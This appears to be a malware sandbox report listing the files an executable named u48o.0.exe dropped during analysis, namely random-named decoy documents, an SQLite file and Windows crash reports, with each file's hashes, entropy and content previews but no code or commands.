SHA1:	243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:	312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\LFOPODGVOH.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\u48o.0.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698393795110914
Encrypted:	false
SSDEEP:	24:weX7B5oYsT2B9e4Feb4OKL65JIiga/zOnv9iY81icgfiTetEc8E:FPoYsqB9e4dP63IigGOvo11LetEc8E
MD5:	7C5655873C22D2522B13B34841F82038
SHA1:	ED733AE5B3E813B97D69E7283AEB8085EFC62B78
SHA-256:	9A515FAA0EE108930EC0C597C9E2CA74B21C3C9D45F3F845954A65F3FA4C494D
SHA-512:	A98C25203B5A8C5C3FE7859E1B128BA3C0B5691BE716C53CA427770F10EC65CBB8B704EEA994BCE1ECA69EC4D46BCC0D48FE844653B964E96D1248D2E211CBD2
Malicious:	false
Reputation:	unknown
Preview:	LFOPODGVOHLLKBCXZQUOXPFEKGPKVDEYIZRZGQPAXXVWAHGTCBCWCYBHYOPHLEVYFLCEXNMVAAPUECIPRDZTIBJFGFXDAEMKYPYGCWSRTCUEEDISUDHVYQEPCSIKRBOXVZVTBFVUQHQYHEIWQPMZFNXNKGPPDGDMKJWAYJVYMRCYCWORBYPZYIFTAANBVDPJJOGYMYDPMPCNSOQVKLKNKHQVJQRYOOACYXVWFBJGOZRXUBDUSJEQNJXCVPHTUWAVCILOAXOWIJVWKMAIOEWTHGQELYIGVJJZNFBDSZXPZMLZNFDRIJQQQDSSMCBEMRHVOYIGRXSYQYDLBDBDJCVRREJGRUBPNYBFUCUXLMUIULULHCWJQQEMKBQMLJBDJQHFXPNODSTVZXWZZOXPIXKBRKMKOYEBDUBYOGMGXHFMCUIKRQYQMHGUBUAAFTMUCZNIIVAIOOBIASAJPKXIYIQIRVIIXGNUEDAXQJYWQXOBTAINKSTSHZGNUWVHVDUXVGWBWRXOYEGSIRNXRHBFOAWRQVFKAGDUSHRWQWJQRNMOGHTWFHOOZGRSVCSEJNMPDYUGTSBOMGHSHACUNTVVGKNAZSSLLQOXMCBVKFFAQLQCWYNIWPVJRECIKVCXZGCNHKXMQDPPOURAWIKZOZEFLDUYVIGDPGUMGOGBUYKGLVLWQSDAHAAIVFUNWQIWKRCSLCPMZBWBBDTBBVTZNYCLEIZNLQRHKBOLVTUTWSURDWQTCHAPUMJQWNVWVGFLAAPEHMLBUSYJCZDJUMZMKIOKIMVTYPMCXUXWVXIMVUCNXESHIVCKNFAALGDXCVJHQZWLDSAWNJWFBTHDBKGVKXLWDOPOOBJMPJCKUXVNFQVOUEIHJKOHTDCQCDOFQBMSQNWVDKTKWJIFVOMWEUJULPMGUSEWAZAHAZVGRSWNQYXPMKFWQGODZHVNOEXZBPLONONBPAHCDWEMSFLRJBFMOKMCLAGRJEGRTGVETXSZKDXQWEOD

C:\ProgramData\LIJDSFKJZG.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\u48o.0.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.69486718145169
Encrypted:	false
SSDEEP:	24:XvKYeI9D5UOyoiaxIKgpZ9ONvMyTONN5ZjJH1U:yyD6yxILZ9OtTT+XRG
MD5:	E63B196AE0D5F7670244FB1347D75EFC
SHA1:	1C17108AC7E5263674836BAD67AE44D8C3C6890B
SHA-256:	D8C0D7B9CDFC72CAAB0A7687299B6734708E98C6DD088CDB0FF1A659E294B49D
SHA-512:	63345352964E1BD19AC843F82820E9B29C5BA991A002AB9B3164E1AA10B6D88BFA0DFAFA2E91E584835BA89B6A1770140AC14EA0B4B64E6C3BF8CDA34C9698AC
Malicious:	false
Reputation:	unknown
Preview:	LIJDSFKJZGBDGXNCCVBULCELYCDFJRIXKMFPVDHHKPYEYOXKFYMNEETRQHXLDRVBOTNERMYOYUJOPHUSKFPWBGKNJYBGZTTHNKGNUZWATSMORYBOIKBFSVUUMZNDYXOYKYUKGRNFVRQOPBEEIPDGTPBXCNLKHMGPHFCEQOUTEDGJZTMFUUGECZETRSODGZCJVQEAMRZADPDVQRANZOSHTGPOXPXGXXQDJVYZOCNXDECWJISPPIJOZUBSSKPGODUHTISNESPZRLELINJJYOXSBFTVUDENIBRDIMMGFIQNDGUSXDBHQNJRYLFTZGOCELKZGOQQKNDPFAMTXHBKHJYXYEGLJLANRMMTCVEFYRTWLXIMCCHDWVOLGVUWRNLSIBMLMBKVSYLKXRTMZROHVHCRDBCODTPNVQMBPRJGBGOOFVGDIERMXUFETJQWDXSQQFMQAZGGRVNRCUOAVYJDIMQETJOANIIDEGJCHEFRSNVBQAQBBUTTMXBTJXRHLSOCTPPBIKPXITOOCINTVZYAVQLVOOZWSOPLYJPOTKFKIKEHIDDPCDDEPKVDYQAVTVBFYYWCGUKGIDVLQSIPXISDEDNJWONTSILFUGUYMKQLKEJGOOCBYSXDFHNFHHWGLXWWQKSSOHSSTZLRZVRHZVBZGGEZQFSIWQQPMILSPBAMPAGAHHVJJCITDTJRZTRBEXSXOVDKONGLMSWBAOOYAFISJHKEYUKIWXBFUDUMVQRELEPVTNQBALAQOEAEFVPIKNYIPNICGKQFRVXNQUEFULLOYWMHOMUFEMHYNKNWMAOBGWSECZOKWISDOIKSUVWBGWPNAMFUHBRWEJQPHFPEKIRLAEPTBNRQEUVXXIZSSOOEFEETUMNPSVEAKOXVYHAOIXBEYBVXDJXZCNDVOPZLARFFUSXUOWXQBKDLINBWBQLXLHHNIXZEPCNHFEIZUZSTXWFUITSBKYSELMNKNBBDQMNLAIOSKYHCWGFPNUXAFSRHOWYH

C:\ProgramData\LIJDSFKJZG.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\u48o.0.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.69486718145169
Encrypted:	false
SSDEEP:	24:XvKYeI9D5UOyoiaxIKgpZ9ONvMyTONN5ZjJH1U:yyD6yxILZ9OtTT+XRG
MD5:	E63B196AE0D5F7670244FB1347D75EFC
SHA1:	1C17108AC7E5263674836BAD67AE44D8C3C6890B
SHA-256:	D8C0D7B9CDFC72CAAB0A7687299B6734708E98C6DD088CDB0FF1A659E294B49D
SHA-512:	63345352964E1BD19AC843F82820E9B29C5BA991A002AB9B3164E1AA10B6D88BFA0DFAFA2E91E584835BA89B6A1770140AC14EA0B4B64E6C3BF8CDA34C9698AC
Malicious:	false
Reputation:	unknown
Preview:	LIJDSFKJZGBDGXNCCVBULCELYCDFJRIXKMFPVDHHKPYEYOXKFYMNEETRQHXLDRVBOTNERMYOYUJOPHUSKFPWBGKNJYBGZTTHNKGNUZWATSMORYBOIKBFSVUUMZNDYXOYKYUKGRNFVRQOPBEEIPDGTPBXCNLKHMGPHFCEQOUTEDGJZTMFUUGECZETRSODGZCJVQEAMRZADPDVQRANZOSHTGPOXPXGXXQDJVYZOCNXDECWJISPPIJOZUBSSKPGODUHTISNESPZRLELINJJYOXSBFTVUDENIBRDIMMGFIQNDGUSXDBHQNJRYLFTZGOCELKZGOQQKNDPFAMTXHBKHJYXYEGLJLANRMMTCVEFYRTWLXIMCCHDWVOLGVUWRNLSIBMLMBKVSYLKXRTMZROHVHCRDBCODTPNVQMBPRJGBGOOFVGDIERMXUFETJQWDXSQQFMQAZGGRVNRCUOAVYJDIMQETJOANIIDEGJCHEFRSNVBQAQBBUTTMXBTJXRHLSOCTPPBIKPXITOOCINTVZYAVQLVOOZWSOPLYJPOTKFKIKEHIDDPCDDEPKVDYQAVTVBFYYWCGUKGIDVLQSIPXISDEDNJWONTSILFUGUYMKQLKEJGOOCBYSXDFHNFHHWGLXWWQKSSOHSSTZLRZVRHZVBZGGEZQFSIWQQPMILSPBAMPAGAHHVJJCITDTJRZTRBEXSXOVDKONGLMSWBAOOYAFISJHKEYUKIWXBFUDUMVQRELEPVTNQBALAQOEAEFVPIKNYIPNICGKQFRVXNQUEFULLOYWMHOMUFEMHYNKNWMAOBGWSECZOKWISDOIKSUVWBGWPNAMFUHBRWEJQPHFPEKIRLAEPTBNRQEUVXXIZSSOOEFEETUMNPSVEAKOXVYHAOIXBEYBVXDJXZCNDVOPZLARFFUSXUOWXQBKDLINBWBQLXLHHNIXZEPCNHFEIZUZSTXWFUITSBKYSELMNKNBBDQMNLAIOSKYHCWGFPNUXAFSRHOWYH

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_u48o.0.exe_dee1b1ea4a9ae441cb96d7d5f1d83f52d6e9b_43204522_92a37e22-e842-46c4-b06a-41186f4d0fa6\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.0554331083046358
Encrypted:	false
SSDEEP:	192:gDswrf4qo0L5hN0YxAjSXZrMZ29bzuiF+/Z24IO8pMX:gD/f4qDl705j7MbzuiFsY4IO8S
MD5:	C768AC9E0E28B52DBACC78208D6B6FF5
SHA1:	B774E7D0C7C5EF533B23EF9EE07D80ABAB3A3563
SHA-256:	1ABF1CF17537B39D7D2E2F88236505F45F61E8CF02BAF192B68BE149827BCDB5
SHA-512:	9AC0274058AB7F42221992952A83AF8CB833DBCF1CC70D5353AD85CD21109613B30C84AB7395C1AD71CF2ECCBABFCD4E0009439186596A42D28F27DAA1450F62
Malicious:	false
Reputation:	unknown
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.8.3.3.8.4.9.7.5.3.8.2.1.4.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.8.3.3.8.4.9.8.0.6.9.4.6.3.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.2.a.3.7.e.2.2.-.e.8.4.2.-.4.6.c.4.-.b.0.6.a.-.4.1.1.8.6.f.4.d.0.f.a.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.9.1.a.7.0.c.4.-.1.3.b.8.-.4.f.2.2.-.b.e.0.3.-.6.5.a.5.0.1.8.9.0.2.e.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.u.4.8.o...0...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.f.4.8.-.0.0.0.1.-.0.0.1.4.-.5.d.a.0.-.4.e.e.4.5.1.9.5.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.6.d.1.e.2.8.0.e.6.6.b.f.b.4.7.9.f.5.4.2.a.6.f.c.4.4.6.4.0.5.a.0.0.0.0.0.0.a.1.6.!.0.0.0.0.b.e.3.9.d.0.7.7.0.4.e.f.b.3.5.b.d.1.5.0.3.b.3.9.1.4.c.6.d.d.6.c.9.e.6.3.1.2.e.8.!.u.4.8.o...0...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_zLwT7vCojz.exe_8d4cb8727758e3c5ce8bac1351ea612d3d1fe4_54d878a7_7b68542c-fa44-4dd0-ba40-30be569c4f59\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	modified
Size (bytes):	65536
Entropy (8bit):	1.0239986286003018
Encrypted:	false
SSDEEP:	192:Va7d9nOCzIlOYu70Rlize5jjSJ0xkzuiF/Z24IO8R+t0:grIoPIRlizqjQzuiF/Y4IO8y
MD5:	5570B07A1A622F4BBAD3AF8993909777
SHA1:	E412B10DB8667020A55CF650DB04CED930D76CB0
SHA-256:	0A4BF36CF36A0C86F8E2CDBCAE59F0E40A44DAA3A4E2C2422C0491333DC32492
SHA-512:	6293338864591EB3B653E6045BC1535B6184C3A47265A9FA3E0C4A7C5C6E65DE4CB9FC779506DFAB4EC432321589B1728A51B621DD6CAE2F0AB24DB7DD5620F3
Malicious:	false
Reputation:	unknown
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.8.3.3.1.8.0.0.3.5.7.9.3.9.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.8.3.3.1.8.0.1.1.8.6.0.5.7.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.b.6.8.5.4.2.c.-.f.a.4.4.-.4.d.d.0.-.b.a.4.0.-.3.0.b.e.5.6.9.c.4.f.5.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.5.b.c.3.0.e.7.-.2.8.0.b.-.4.c.4.5.-.a.a.6.9.-.1.a.6.e.3.0.a.a.c.6.d.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.z.L.w.T.7.v.C.o.j.z...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.5.7.8.-.0.0.0.1.-.0.0.1.4.-.c.8.e.8.-.0.5.e.2.5.1.9.5.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.f.8.4.3.b.d.e.0.6.e.7.e.a.7.a.0.2.e.6.2.c.0.2.5.f.8.a.2.c.6.f.6.0.0.0.0.0.a.1.6.!.0.0.0.0.b.3.6.d.6.4.d.5.c.4.6.9.8.2.f.8.5.c.8.9.0.d.1.2.9.c.4.3.9.a.6.7.8.2.9.9.d.1.1.e.!.z.L.w.T.7.v.C.o.j.z...e.x.e.....T.a.r.g.e.t.A.p.p.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER49D0.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Tue Apr 23 09:34:57 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	56790
Entropy (8bit):	2.653099825044508
Encrypted:	false
SSDEEP:	384:6LQ/DVa8C5vEEusJCoh5ZE1GQWDDaPOd:W2VE5vEEFCk56A1Ow
MD5:	D36FAF507A1DCB1D9DAAEF55DA10465F
SHA1:	48FFFA1D4ECB4D1328A99821ACB155EC80486897
SHA-256:	F031D5043FE755BC1BA48F45698F5400F516A6621F1E7099BCE1EAE5C17C56AE
SHA-512:	A4B22D89B2DF3BB1F0322F801C692B65A1E486F614D3527E673E5587F3F1569082DAE40DB776C1F2AEAA0C57BC87FED24639B4FC2313B2B099314AA28F609C1D
Malicious:	false
Reputation:	unknown
Preview:	MDMP..a..... .........'f............4...........p...<.......t...22..........T.......8...........T...........XS..~............"...........$..............................................................................eJ......0%......GenuineIntel............T.......H....f'f.............................0..2...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER4ACB.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	6312
Entropy (8bit):	3.7180543108890003
Encrypted:	false
SSDEEP:	192:R6l7wVeJ4I6iY3YiddXpDy89b3ysfcfdm:R6lXJP6t3YiJ3xfz
MD5:	5C4E3B4C31EFF22F8966BC8165CB543C
SHA1:	58BB449C43BE34D280B7E9076F9F8F853A34A8EA
SHA-256:	6AB516EC2671897B2428ED8C9500FFD62EDE07B2E9C2645299260394A288E13D
SHA-512:	0072BE1014A63E983828082E667ADF8375938FB39B60136F90C764837488C5557B5A442F966569B055725CD36C1B48780069B0EC379C368FBB1FAFB7AF831B6D
Malicious:	false
Reputation:	unknown
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.9.1.2.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER4B0B.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4555
Entropy (8bit):	4.434529210286872
Encrypted:	false
SSDEEP:	48:cvIwWl8zssJg77aI9EnWpW8VY93Ym8M4JcmTUFq+q8ZSTf58ILcQd:uIjfqI7yW7VRJ9H8ILfd
MD5:	7BF5A91905DF0BA6544F27DE72199710
SHA1:	F30E574CBBE43B6572B76290F235E992A86CA0C1
SHA-256:	8FF6AC7D4DF2291BF8B40375B24505B5016A638C084FD7E29697F796BAFDB9D0
SHA-512:	59319E3E51F9A44C6A946F705BE5909CB2493A53ED1217E6690E83C1641D7D942BB02D7DC4D91520AF013D49EFD2CFCB4621D40A74F33A3AC8E5B78DBB2403F6
Malicious:	false
Reputation:	unknown
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="292357" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD9E0.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Tue Apr 23 07:43:20 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	44551
Entropy (8bit):	2.8741116674336293
Encrypted:	false
SSDEEP:	384:6W+UrKUX/G3O1PTyR266A9bWSg4tds049qPJdM61Y:H+UWUX/G3O1GR22YR04C8
MD5:	744C6308EF6952B17BE101845F7ABD02
SHA1:	9AA87C15A81E65DF714E9AF43AF47CD13346B194
SHA-256:	21A9FD217EB0179E3D628C997D00193A8C4CFC596F0A0E25DCF62B6D9D881C2D
SHA-512:	F9492F1717C40B448F3CED1A70CE51E76402474E9D90BBBE74AA383CD44D5C8382D704CF90B3D1DFE485B1B6E985A7E9E9340264900A87F4BE8C895DFF55F509
Malicious:	false
Reputation:	unknown
Preview:	MDMP..a..... ........f'f............4...............H............!......D...l6..........`.......8...........T...........p1...\|...........#...........%..............................................................................eJ......h&......GenuineIntel............T.......x....f'f.............................0..2...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERDB39.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8338
Entropy (8bit):	3.69977612383945
Encrypted:	false
SSDEEP:	192:R6l7wVeJeue6Hie6YNhSU9+mRgmf7D6vSpDm89bpKsfeEDm:R6lXJO6r6Y7SU95Rgmfyvgppfe9
MD5:	E166D5A19E753353A5ED9E57CA3D12F6
SHA1:	052DE7DE6BC7C12036D86CD9DF050AE632E357EE
SHA-256:	296B40369AC9FD21B0A96002F2435A88E0FE2520A470FA8D0DFA513C44B95C6E
SHA-512:	21D2BB25499440E060B95DF1CDEDFEC2CFAB1D1096930D18892F5C0B1DAE335FC15C1369936A40170FCD248982261E9C9B3AF5BC88B850046109BC561583F3C0
Malicious:	false
Reputation:	unknown
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.4.9.6.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERDBA7.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4583
Entropy (8bit):	4.473150504746131
Encrypted:	false
SSDEEP:	48:cvIwWl8zslJg77aI9EnWpW8VYPYm8M4JcZFf7m+q8SjtCG4cHdd:uIjf/I7yW7VzJq6Hb4idd
MD5:	ADFD29DB4262CFEB9F74D8987158026E
SHA1:	B9BE0C27235B2A13ED05B8DFB04C5777EF368D34
SHA-256:	A50AC9AD868B1BF7DFB6F5E9F03D897787E799343B42BF03A74A951D48F892BF
SHA-512:	C9E7F4BCC6CF953FA1AE8929F72AD8364BC6DDCF6CB89DCBA71BAB4FD48AE47B51AA71AB361D3682B98F67E92CE42B1F36C1F9F1B7B5ABFAEC82689B0A32D4B1
Malicious:	false
Reputation:	unknown
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="292246" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\OOJWCGHFZE.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\u48o.0.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696658693841717
Encrypted:	false
SSDEEP:	24:3MdIzLOg7SRKnk/cq8LUPYkwD7V07An1JLnjzXUPxLPu2k:3MILOg7SRKnqc5LU5oJ07A1JLnjzEBa
MD5:	61FF9363393269AD641F7DD8C14B5456
SHA1:	27855AC1499F6627BEB4D32C7DC77938A30F6B93
SHA-256:	5C4C4BA12F53DFAFD9ABBB44B9B6D42659217438CFE3C6710A2EAC3F2BBFAB2C
SHA-512:	636A83074F9C57EB8A5E8B2C17BAF1A60991B708F66E2E9BDCE70BF794E0D739849D4F6869EE3B45E529F9475BD8564AE66323FF0BCD06F4FA6FA213B0797C55
Malicious:	false
Reputation:	unknown
Preview:	OOJWCGHFZEYSVZSAVMGYFBZRQQVSPNKBSTFPIOXXACNWRXKBHEDWMUIFWAWPQFWWAYZBICXUMMZCLEUMDPYVPQRXQHCCBBIMLEYUCJTVIVHFVVALUDEUETBIGNGUYMTGFEFTYJDSOYIAGMAQACYHUALMXJEFLZIDJYQFYVMBLVJNYNVGMNZJNSUVMBGBYVXPDEWEGTGCOCELIMUCEYVSVRJNWAVFEDEKEFNKTYJYNMAIYMYUVCPQJCFORLEBTNEKVJQRKILYXNBOBHMHUQTFGWEZPTHSMKTNLWSHZRUKDCAMLMWJCBANNXSWEWWXNSKAVUXCXGWNJJSPEPOEOBEKQUUWBMBZHFOPPRYHDWPNLHYGQQAZMBKWTAOWYOLVGFETIBSZPNVKJZCVZHBLSVXXEZZZLOCAQBFRQRVLVLPOOKQLFZGMLSNUTBQWYKFAXKVUVDUHDHXUHXXLOJYSHSJSCDCSKSTRRIPKJTBSLGIRCVKDCTBNPMZMOCYWVVNCFLJOJAJXVTJNCACZLKULPCEQNVJXNHDCWDSASISDDFXERTWELSGCJXIPLIRYDNQBUUOQBDXNWXADWLFOUDJHYDMOKSFNWWDJZFNTEXZUQRTGGDNGSTMLLNHJWRRQKMWNHWVIYWOUQTPCIYXQLYYJUIUPPKXQQSYLIAYGNMUUJTVHNEKUJEWBEGNESVSMTMPBREMJMHBDPPODBEINHWXDHWVYNWSVOLHAZPSGKPFGELKZREADIJXSJHADRPPBSICVJDYZYWRQHOCWRXHZMHTFJEUDQDLLIAMFGRBMNAFOWVKHIQEMMHBAEDJDWLLCHLNMHVWRQOKFAJIUONMFXMFHYYZUMJXSEDOCEDACVHVOCVDSGVNGXXLLQDXUWIIWAIHTXOXJTBSWVOKBYKVWKJUWYNFPWJPCDFHBRUIEEGNVETOEPLBLCMJLVKSRMJYTXYKQZFYSEOZJRYLRBKWLTVQNZOSNCFWFBSDCCDRGPMCIKAWU

C:\ProgramData\QFAPOWPAFG.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\u48o.0.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.690474000177721
